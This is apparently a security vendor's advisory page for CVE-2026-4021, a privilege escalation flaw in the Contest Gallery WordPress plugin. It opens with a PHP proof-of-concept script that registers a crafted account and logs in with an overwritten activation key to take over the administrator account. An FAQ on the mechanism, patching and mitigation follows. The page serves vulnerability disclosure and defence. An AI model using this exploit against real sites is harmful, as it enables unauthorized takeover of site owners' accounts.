// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4021 - Contest Gallery <= 28.1.5 - Unauthenticated Privilege Escalation Admin Account Takeover via Registration Confirmation Email-to-ID Type Confusion
<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$admin_id = 1; // Target administrator user ID
$attacker_email = $admin_id . 'poc@atomic-edge.test'; // Email starting with admin ID
$attacker_username = 'atomic_edge_poc';
$attacker_password = 'Password123!';

// Step 1: Register account with crafted email
$register_data = [
    'action' => 'post_cg1l_create_user',
    'cg_input_username' => $attacker_username,
    'cg_input_email' => $attacker_email,
    'cg_input_password' => $attacker_password,
    'cg_input_password_repeat' => $attacker_password,
    'cg_gallery_id_registry' => '1', // Any valid gallery ID
    'cg_reg_mail_optional' => '1' // Ensure RegMailOptional setting is active
];

$ch = curl_init($target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $register_data);
$response = curl_exec($ch);

// Extract activation key from response (in real exploit, trigger confirmation flow)
// The confirmation would be triggered via visiting the confirmation link
// or simulating the confirmation request to users-registry-check-after-email-or-pin-confirmation.php

// Step 2: After confirmation triggers key overwrite, login with stolen key
$login_data = [
    'action' => 'post_cg1l_login_user_by_key',
    'cglKey' => 'cg-key---CONFIRMED_KEY_HERE', // The admin's overwritten activation key
    'cgl_gid' => '1'
];

curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
$login_response = curl_exec($ch);
curl_close($ch);

// If successful, response sets authentication cookies
// The attacker is now logged in as administrator

echo "Exploit attempt completed. Check if admin session established.n";

?>

Frequently Asked Questions

What is CVE-2026-4021?
Overview of the vulnerability
CVE-2026-4021 is a high-severity vulnerability in the Contest Gallery plugin for WordPress, allowing unauthenticated attackers to escalate privileges and take over administrator accounts. This is due to a flaw in the email confirmation handler that misuses user email strings in SQL queries.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exploits a type confusion issue where an attacker registers with an email starting with a numeric user ID. This allows the attacker to overwrite the admin’s user activation key and authenticate as the admin without credentials.
Who is affected by this vulnerability?
Identifying vulnerable installations
All installations of the Contest Gallery plugin up to and including version 28.1.5 are affected. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Contest Gallery plugin in use. If it is version 28.1.5 or earlier, your site is at risk and should be updated immediately.
How can I fix or mitigate this issue?
Updating the plugin
To fix this vulnerability, update the Contest Gallery plugin to version 28.1.6 or later, where the issue has been patched. Regularly updating all plugins is crucial for maintaining site security.
What does the CVSS score of 8.1 indicate?
Understanding the severity rating
A CVSS score of 8.1 indicates a high severity level, meaning that the vulnerability poses a significant risk to the security of the WordPress site. Exploitation can lead to complete administrative access and control over the site.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
If exploited, an attacker can gain full administrative access, create new admin accounts, modify site settings, upload malicious files, and access sensitive user data. This could lead to data breaches and site defacement.
What are the key changes made in the patch?
Improvements in the updated version
The patch replaces the vulnerable SQL query with safer methods, ensuring proper integer comparison. It also enhances the login mechanism to require additional validation parameters, reducing the risk of unauthorized access.
How does the proof of concept demonstrate the vulnerability?
Example of exploitation
The proof of concept outlines the steps an attacker would take to exploit the vulnerability, including registering with a crafted email and triggering the confirmation flow to overwrite the admin’s activation key. This illustrates the ease of exploitation.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Contest Gallery plugin until the update can be applied. Additionally, review user accounts for any unauthorized changes and monitor site activity closely.
Are there any other security practices I should follow?
General WordPress security recommendations
In addition to updating plugins, regularly back up your site, use strong passwords, implement two-factor authentication, and monitor user activity. These practices help enhance overall site security.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-4021 can be found on the official CVE database, security advisories from WordPress, and relevant security blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations